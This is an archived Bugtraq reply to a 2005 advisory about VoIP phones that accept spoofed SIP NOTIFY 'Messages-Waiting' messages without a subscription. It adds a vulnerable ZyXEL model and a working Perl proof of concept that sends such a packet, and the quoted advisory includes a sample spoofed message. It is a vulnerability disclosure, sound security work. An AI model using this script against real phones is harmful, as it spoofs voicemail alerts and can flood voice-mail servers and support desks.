Re: VoIP-Phones: Weakness in proccessing SIP-Notify-Messages

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: VoIP-Phones: Weakness in proccessing SIP-Notify-Messages
From: Javor Ninov <drfrancky@xxxxxxxxxxx>
Date: Mon, 18 Jul 2005 19:10:44 +0300
In-reply-to: <42CC04C1.4060105@xxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <42CC04C1.4060105@xxxxxxxxxxxxxxxxxxx>
User-agent: Mozilla Thunderbird 1.0 (Windows/20041206)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZyXEL Prestige 2000W VoIP Wi-Fi Phone - VULNERABLE
and just a quick POC:

#!/usr/bin/perl
# SIP NOTIFY POC by DrFrancky@xxxxxxxxxxx
use Socket;
SendSIPTo("10.0.0.1"); # IP of the phone

sub SendSIPTo{
$phone_ip = shift;
$MESG="NOTIFY sip:chaos\@$phone_ip:5060 SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4:5060;branch=000000000000000
From: \"drfrancky\" <sip:drfrancky\@1.2.3.4>;tag=000000000
To:  <sip:chaos\@$phone_ip>
Contact: <sip:drfrancky\@1.2.3.4>
Event: message-summary
Call-ID: drfrancky\@1.2.3.4
CSeq: 102 NOTIFY
Content-Type: application/simple-message-summary
Content-Length: 37
Messages-Waiting: yes
Voicemail: 3/2";

$proto = getprotobyname('udp');
socket(SOCKET, PF_INET, SOCK_DGRAM, $proto) ;
$iaddr = inet_aton("0.0.0.0");
$paddr = sockaddr_in(5060, $iaddr);
bind(SOCKET, $paddr) ;
$port=5060;
$hisiaddr = inet_aton($phone_ip) ;
$hispaddr = sockaddr_in($port, $hisiaddr);
send(SOCKET, $MESG, 0,$hispaddr ) || warn "send $host $!\n";
}



DrFrancky
Tobias Glemser wrote:
|                   Tele-Consulting GmbH
|             security | networking | training
|
|                 advisory 05/07/06
|
| URL of this advisory:
| http://pentest.tele-consulting.com/advisories/05_07_06_voip-phones.txt
|
|
| Topic:
|     Weakness in implemenation of proccessing SIP-Notify-Messages
|     in VoIP-Phones.
|
| Summary:
|     Due to ignoring the value of 'Call-ID' and even 'tag' and
|     'branch' while processing NOTIFY messages, VoIP-Hardphones
|     process spoofed status messages like "Messages-Waiting".
|
|     According to RFC 3265, Chap 3.2 every NOTIFY has to be em-
|     bedded in a subcription mechanism. If there ain't knowledge
|     of a subscription, the UAC has to respond with a "481
|     Subscription does not exist" message.
|
|     All tested phones processed the "Messages-Waiting" messages
|     without prior subscriptions anywhere.
|
| Effect:
|     An attacker could send "Messages-Waiting: yes" messages to
|     all phones in a SIP-environment. Almost every phone proccesses
|     this status message and shows the user an icon or a blinking
|     display to indicate that new messages are available on the
|     voice box.
|
|     If the attacker sends this message to many recipients in a
|     huge environment, it would lead to server peaks as many users
|     will call the voice box at the same time.
|     Because there are no new voice messages as indicated by the
|     phone the users will call the support to fix this alleged server
|     problem.
|
|     All tested phones process the message with a resetted Call-ID,
|     'branch' and 'tag' sent by a spoofed IP-Adress.
|
| Example:
|     Attacker spoofs the SIP-Proxys IP, here: 10.1.1.1
|     Victim 10.1.1.2
|
|     UDP-Message from Attacker to Victim
|
|     Session Initiation Protocol
|          Request-Line: NOTIFY sip:login@xxxxxxxx SIP/2.0
|          Message Header
|              Via: SIP/2.0/UDP 15.1.1.12:5060;branch=000000000000000
|              From: "asterisk" <sip:asterisk@xxxxxxxx>;tag=000000000
|              To: <sip:login@xxxxxxxx>
|               Contact: <sip:asterisk@xxxxxxxx>
|               Call-ID: 00000000000000@xxxxxxxx
|              CSeq: 102 NOTIFY
|                  User-Agent: Asterisk PBX
|               Event: message-summary
|               Content-Type: application/simple-message-summary
|               Content-Length: 37
|          Message body
|               Messages-Waiting: yes\n
|               Voicemail: 3/2\n
|
| Solution:
|     Phones who receive a NOTIFY message to which no subscription
|     exists, must send a "481 Subscription does not exist" response.
|     It should be possible to use the REGISTER request as a
|     non-SUBSCRIBE mechanism to set up a valid subscription.
|
|     This would reduce the possibility of an attack in a way, that
|     only with a sniffed and spoofed subcription such an attack would
|     be possible. Background is given by the way dialogs are des-
|     cribed in RFC 3261 and the sections 5.5 and 3.2 of RFC 3265.
|
|
| Affected products:
|     Cisco 7940/7960
|     Grandstream BT 100
|     others will be tested in future
|
|
| --
| Tobias Glemser
|
|
| TTTTTTT CCCC
|   TT   C  tglemser@xxxxxxxxxxxxxxxxxxx         +49 (0)7032/97580  (fon)
|   TT  C   pentest.tele-consulting.com          +49 (0)7032/74750  (fax)
|   TT  C
|   TT   C  Tele-Consulting GmbH, Siedlerstrasse 22-24, 71126 Gaeufelden
|   TT    CCCC             security | networking | training

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFC29SEck4kcwaj+YIRAuFHAJ96TyJSLht5oEg4YsgQ8t35ZbQlDQCfWjus
BUebT6XwEIzBUMPPSmf+T8g=
=qeT4
-----END PGP SIGNATURE-----

References:
- VoIP-Phones: Weakness in proccessing SIP-Notify-Messages
  - From: Tobias Glemser

Prev by Date: [KDE Security Advisory]: Kate backup file permission leak
Next by Date: MRV In-Reach console server: Port Access Control Bypass Vulnerability
Previous by thread: VoIP-Phones: Weakness in proccessing SIP-Notify-Messages
Next by thread: Re: VoIP-Phones: Weakness in proccessing SIP-Notify-Messages
Index(es):
- Date
- Thread